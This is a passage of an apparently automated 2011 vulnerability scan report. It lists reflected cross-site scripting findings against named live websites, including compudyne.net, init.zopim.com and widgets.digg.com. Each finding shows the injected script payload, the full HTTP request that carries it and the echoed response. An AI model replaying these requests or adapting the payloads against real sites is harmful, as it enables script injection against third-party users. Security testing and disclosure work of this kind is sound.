User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 20:15:05 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 4688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >


<head>

<meta htt
...[SNIP]...
<a href="print.php?page=EDGE-Anti-Spam5ddda\"><script>alert(1)</script>ec0e962dd34" target="_new">
...[SNIP]...

1.17. http://compudyne.net/products-services/print.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /products-services/print.php

Issue detail

The value of the page request parameter is copied into the HTML document as text between TITLE tags. The payload 17679</title><script>alert(1)</script>6564f449fad was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/print.php?page=17679</title><script>alert(1)</script>6564f449fad HTTP/1.1
Host: compudyne.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 21:13:29 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Length: 2938
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
<meta name="Keywords" content="Compudyne, Duluth,
...[SNIP]...
<title>
17679</title><script>alert(1)</script>6564f449fad Compudyne :: Computer Services, Network Analysis, IT Planning, Network Design, Implementation & Support
</title>
...[SNIP]...

1.18. http://init.zopim.com/register [mID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://init.zopim.com
Path:   /register

Issue detail

The value of the mID request parameter is copied into the HTML document as plain text between tags. The payload 7a5fc<script>alert(1)</script>ab872688f3df74ff4 was submitted in the mID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /register?ref=&url=http%3A%2F%2Fwww%2Eobtrix%2Enet%2F&jsVer=0%2E4%2E0&swfVer=2371&tabId=%5Fflash%5F1279daa249973c3755fa41935e5e90549fdf6bea&sk=4300947c68314c1251174fbec281db2c179656ed&mID=gLAMf6t1oQdRZ9pJbWZsb367xnR0jSnY7a5fc<script>alert(1)</script>ab872688f3df74ff4&ua=Mozilla%2F5%2E0%20%28Windows%3B%20U%3B%20Windows%20NT%206%2E1%3B%20en%2DUS%29%20AppleWebKit%2F534%2E16%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F10%2E0%2E648%2E205%20Safari%2F534%2E16&accountKey=T3i7TauNSecLEfQ3OfkPOTxuMPzktE3g&ak=T3i7TauNSecLEfQ3OfkPOTxuMPzktE3g&title=Obtrix%20%2D%20For%20Seedboxes%2C%20VPS%27s%2C%20Shared%20Hosting%2C%20Shells%20and%20more%21 HTTP/1.1
Host: init.zopim.com
Proxy-Connection: keep-alive
Referer: http://zopim.com/swf/ZClientController.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Apr 2011 21:13:22 GMT
Connection: keep-alive
Content-Length: 976

{"status": "offline", "__status": "ok", "name": "Visitor 267278572", "settings": {"chatbutton": {"position": "br", "theme": "bar", "useFavicon": false}, "greetings": {"away": {"window": "If you leave
...[SNIP]...
"Leave a message"}, "online": {"window": "Leave a question or comment and our agents will try to attend to you shortly.", "bar": "Click here to chat!"}}}, "machineID": "gLAMf6t1oQdRZ9pJbWZsb367xnR0jSnY7a5fc<script>alert(1)</script>ab872688f3df74ff4", "nick": "visitor:267278572", "host": "lc05.zopim.com", "chat": {"members": [], "history": []}, "sid": "J18JqFUtl2FopiSCBPlkUZwOB131zZPKI5Uyd6Wk", "groups": [["Sales", "offline"]], "evt": 0, "email":
...[SNIP]...

1.19. http://widgets.digg.com/buttons/count [url parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 427f9<script>alert(1)</script>671a266bc8f was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//xss.cx/examples/dork/xss/stored-reflected-xss-sql-injection-reputationcom.html427f9<script>alert(1)</script>671a266bc8f HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://xss.cx/examples/dork/xss/stored-reflected-xss-sql-injection-reputationcom.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Thu, 21 Apr 2011 21:09:16 GMT
Via: NS-CACHE: 100
Etag: "6455c0cc577d0689931edac1a81965367cb5a004"
Content-Length: 170
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Thu, 21 Apr 2011 21:19:15 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://xss.cx/examples/dork/xss/stored-reflected-xss-sql-injection-reputationcom.html427f9<script>alert(1)</script>671a266bc8f", "diggs": 0});

Report generated by XSS.CX at Thu Apr 21 21:06:54 CDT 2011.